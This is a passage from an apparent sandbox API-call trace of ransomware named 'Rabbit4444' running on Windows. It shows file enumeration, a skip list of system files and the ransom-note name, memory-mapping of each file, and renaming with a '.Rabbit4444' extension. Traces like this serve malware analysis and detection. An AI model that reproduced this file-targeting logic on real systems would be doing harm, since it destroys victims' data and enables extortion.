(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5163e94e-4c07-420b-b173-320232b8afb7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.637] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14994732891) returned 1 [0058.637] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1159) returned 1 [0058.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.637] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0058.638] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0058.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.639] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14994984718) returned 1 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.639] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.639] CloseHandle (hObject=0x298) returned 1 [0058.639] CloseHandle (hObject=0x278) returned 1 [0058.639] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms.Rabbit4444") returned 192 [0058.639] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5163e94e-4c07-420b-b173-320232b8afb7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5163e94e-4c07-420b-b173-320232b8afb7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.640] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e19869c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e19869c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", cAlternateFileName="CL52F5~1.SET")) returned 1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2=".") returned 1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="..") returned 1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="windows") returned -1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.640] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.641] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="boot") returned 1 [0058.641] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.641] lstrcmpiW (lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.641] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms" | out: lpString1="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms") returned="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms" [0058.641] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.641] lstrlenW (lpString="Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms") returned 64 [0058.641] lstrlenW (lpString="Rabbit4444") returned 10 [0058.641] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.641] lstrlenW (lpString=".dll") returned 4 [0058.641] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.641] lstrlenW (lpString=".lnk") returned 4 [0058.641] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.641] lstrlenW (lpString=".ini") returned 4 [0058.641] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.641] lstrlenW (lpString=".sys") returned 4 [0058.641] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54692db7-fc98-4d5e-ac15-cc5095fa5669}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.641] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.642] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14995328748) returned 1 [0058.643] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1036) returned 1 [0058.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0058.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.643] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0058.644] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0058.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.645] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14995607173) returned 1 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0058.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.645] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.646] CloseHandle (hObject=0x298) returned 1 [0058.646] CloseHandle (hObject=0x278) returned 1 [0058.646] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms.Rabbit4444") returned 192 [0058.646] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54692db7-fc98-4d5e-ac15-cc5095fa5669}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54692db7-fc98-4d5e-ac15-cc5095fa5669}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.646] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e33c070, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e33c070, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", cAlternateFileName="CLEAA9~1.SET")) returned 1 [0058.646] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.646] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2=".") returned 1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="..") returned 1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="windows") returned -1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="boot") returned 1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.647] lstrcmpiW (lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.647] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms" | out: lpString1="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms") returned="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms" [0058.647] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.647] lstrlenW (lpString="Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms") returned 64 [0058.647] lstrlenW (lpString="Rabbit4444") returned 10 [0058.647] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.647] lstrlenW (lpString=".dll") returned 4 [0058.647] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.647] lstrlenW (lpString=".lnk") returned 4 [0058.647] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.647] lstrlenW (lpString=".ini") returned 4 [0058.647] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.647] lstrlenW (lpString=".sys") returned 4 [0058.647] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.647] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54d8069e-e75a-4437-b45b-8eb3b8c97434}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.648] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.648] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14995839521) returned 1 [0058.648] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1014) returned 1 [0058.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0058.648] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.649] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.650] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14996088797) returned 1 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.650] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.650] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.650] CloseHandle (hObject=0x298) returned 1 [0058.650] CloseHandle (hObject=0x278) returned 1 [0058.650] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms.Rabbit4444") returned 192 [0058.651] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54d8069e-e75a-4437-b45b-8eb3b8c97434}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{54d8069e-e75a-4437-b45b-8eb3b8c97434}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.651] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4dfa7c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e4dfa7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x390, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", cAlternateFileName="CL8AEA~1.SET")) returned 1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2=".") returned 1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="..") returned 1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="windows") returned -1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.651] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="boot") returned 1 [0058.652] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.652] lstrcmpiW (lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.652] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms" | out: lpString1="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms") returned="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms" [0058.652] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.652] lstrlenW (lpString="Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms") returned 64 [0058.652] lstrlenW (lpString="Rabbit4444") returned 10 [0058.652] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.652] lstrlenW (lpString=".dll") returned 4 [0058.652] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.652] lstrlenW (lpString=".lnk") returned 4 [0058.652] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.652] lstrlenW (lpString=".ini") returned 4 [0058.652] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.652] lstrlenW (lpString=".sys") returned 4 [0058.652] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5530e8cc-1b9e-4798-a880-ba719adfbbbd}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.652] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.653] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14996329137) returned 1 [0058.653] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=912) returned 1 [0058.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0058.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.653] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0058.654] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0058.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.655] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14996586036) returned 1 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0058.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.655] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.655] CloseHandle (hObject=0x298) returned 1 [0058.655] CloseHandle (hObject=0x278) returned 1 [0058.655] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms.Rabbit4444") returned 192 [0058.655] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms" (normalized: 